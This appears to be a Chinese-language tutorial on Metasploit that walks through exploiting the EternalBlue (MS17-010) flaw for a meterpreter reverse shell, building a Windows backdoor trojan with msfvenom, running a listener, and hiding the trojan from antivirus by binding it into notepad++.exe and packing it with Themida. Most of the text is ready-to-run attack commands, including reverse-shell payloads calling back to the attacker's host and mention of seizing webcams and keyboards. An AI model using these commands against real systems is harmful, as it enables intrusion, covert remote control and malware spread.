type
status
date
slug
summary
tags
category
icon
password
metasploit工具使用:
1.打开kali终端
2.用sudo su命令,切换root用户
- 输入msfconsole启动metasploit命令行
msf使用法则:
使用模块→配置模块必选项→运行模块
三步操作,就能实现对主流漏洞的攻击。
metasploit攻击永恒之蓝全流程:
1.使用模块
输入命令:search ms17_010可以查看你需要使用的模块,
再输入以下命令来使用模块:use exploit/windows/smb/ms17_010_eternalblue
2.设置使用必选项:
输入命令:show options
会显示出我们需要设置的必选项。随后更改就使用命令set RHOSTS 192.168.1.128(代表你要攻击谁)
set payload windows/x64/meterpreter/reverse_tcp(payload是攻击载荷,意味着攻击完成后要干什么,这里是想要获取meterpreter)(meterpreter时metasploit后渗透的神器)
set LHOST 192.168.1.136(LHOST为listen host 代表你是谁,即kali主机ip地址)
set LPORT 12345(LPORT为listen port,代表你要在kali上开启的端口,1-65535随便选,但是不能被占用)
3.运行模块
输入命令run即可,如果攻击失败说明目标系统中没有此漏洞。
攻击成功后就会跳转到meterpreter。此时就成功控制了目标靶机了,输入命令help即可查看一些操作指令。
使用kali渗透工具生成远控木马
msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线(msfvenom在shell里使用,而不是在msfconsole终端)
windows可执行程序后门:
msfvenom -p(payload)/ windows/x64/meterpreter/reverse_tcp lhost=192.168.106.128 iport=9999 -f(format) exe(exe windows可执行文件[不一定要exe,根据操作系统的软件后缀来定]) -o(output) demo.exe
这样就会在kali中生成一个demo.exe文件,这就是木马了。随后你如果能将该文件发到目标机中并绕过该机的杀毒软件就可以实现远程控制。
设置诱饵:
输入msfconsole启动命令行,使用use exploit/multi/handler(攻击其他的程序)模块。随后在输入options查看需要更改的配置,将payload改成windows/x64/meterpreter/reverse_tcp,将lhost改成主机ip,将主机端口改成上面使用的端口9999。然后run即可。
随后就可以打开meterpreter了,这时可输入help来查看一些命令比如:打开摄像头,操纵键盘等等。
免除杀毒软件的查杀方法
1.捆绑木马(最基础)
msfvenom -p(payload)/ windows/x64/meterpreter/reverse_tcp lhost=192.168.106.128 iport=9999 -f(format) exe(exe windows可执行文件[不一定要exe,根据操作系统的软件后缀来定]) -x notepad++.exe -o notepad++.exe
可以用任意的软件,将我们的病毒附加在上面,从而进行绕过杀毒软件。
2.加壳:压缩壳,加密壳
(保护软件不被别人反编译,同时也能保护我们的病毒不被杀毒软件所查杀)
利用themida来进行保护即可